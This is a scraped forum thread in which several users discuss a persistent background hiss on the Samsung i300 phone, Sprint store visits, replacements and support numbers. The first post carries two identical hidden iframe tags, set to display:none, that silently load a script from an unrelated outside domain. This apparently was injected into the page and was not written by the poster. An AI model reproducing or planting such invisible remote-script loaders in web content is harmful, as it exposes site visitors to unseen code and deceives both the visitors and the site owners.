+ Reply to Thread

Question I300- Sound Quality?

I just got the i300 and am really enjoying all the great features. One complaint though is a pronounced "hiss" that I hear. I'm coming from a Nokia on the Cingular network that was crystal clear. Does anyone else have this background noise? I'm wondering if it's a phenomenon of the i300, the Sprint network, or do I have a defective phone???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I have no his at all. This may be the clearest and most crisp sound quality I've had yet.

I too have the hiss, and a little bit of voice break up on some calls. Since this is my first digital phone, I did not know if this was normal.

So, I took it to the Sprint store on Monday and had them look at it. The tech said he did not hear the hiss, but "updated" the software anyways.

First of all, there is a hiss. Second, he did not do anything. I checked the software/hardware level after I left the store.

He did say that if the problem persists, I can come back and they will "do something". I guess I will have to take it back again.

When I talked to the Sprint rep on the 888 number, she said that a defect would be covered under the phone's 1 year warantee, and not count as an equipment replacement (which I also pay for each month).

Question Software Updates

I know I've seen it on this forum before that you can update your software, i.e. towers, over the phone. Can someone please post again that steps needed to do that.

Thanks,
    Laurie

I to have the hiss on my phone. I find it very annoying! I purchased my first I300 from my local Sprint store used, it saved me $200. I had the hiss problem and constant crashes after synchronization. I went through the game with the local Sprint store to get the problem resolved. The people at the store said they couldn’t hear the hiss. I had them run their HP test on the phone and it found nothing wrong. I then asked for a Sprint / Samsung technical contact number. Sprint 888-621-2588 and 877-228-2257. Both departments said I shouldn’t have this hiss and they marked my account that the phone should be replaced.

I returned to the Sprint store that night and they unwillingly gave me a new phone. I don’t know what my old phone revision was but I now have a new phone version 1.11 that operates **much** better. Unfortunately the hiss is still present. I sometimes don’t notice the hiss but when I’m in a quite room or my parked car I can hear the hiss very clearly. It’s not a deal breaker yet but I would like it resolved.

Darren

I went back to the Sprint store yesterday to complain about the hiss again. The rep tried and said she did not hear the hiss, and handed it to me. No hiss! She then tried calling her personal cell phone. Again, no hiss.

Embarased, I went home. Every call since then (and every call before then), in a variety of locations, all have the hiss. So, what voodoo magic, super-secret noise cancelling device does the Sprint store have in it?

Alan:

I had a similar experience in the Sprint store. I took the hissing i300 to the store. They ran a test, and the rep. said the hiss was not a problem. I left the store and the hiss was as bad as ever. Sadly, I returned the phone and cancelled my service. I'm going to wait for another carrier to get this phone.

Administrator

Arrow

you guys must indeed have a bad batch of phones...

i dont hear any hiss that bothers me...

moradaf, sorry to hear you returned th phone.. but being a early adpoter you should expect bugs on a 1st generation unit... you gotta take the good with the bad ifyou want to be the first on the block! :p

I also have no hiss. Could the hiss somehow be related to the areas where you live and work?

Marctronixx:

I totally agree with you about the necessity of early adopters. But aren't we aiding the future development of products by whining about the flaws and returning the product?

Administrator

Arrow

if there is a flaw in the slaw (as roscoe used to say on the dukes of hazzard), they know about it... heck, they probably knew about it during production, but it was too late to try to rectify it then.. do you rememebr how long it took them to release this phone to the public? and when it was released.. no major ads or anyting.. my i300 just showed up on the doorstep.. so, yes whining about it will get things changed, but i betcha they already knew about the issues...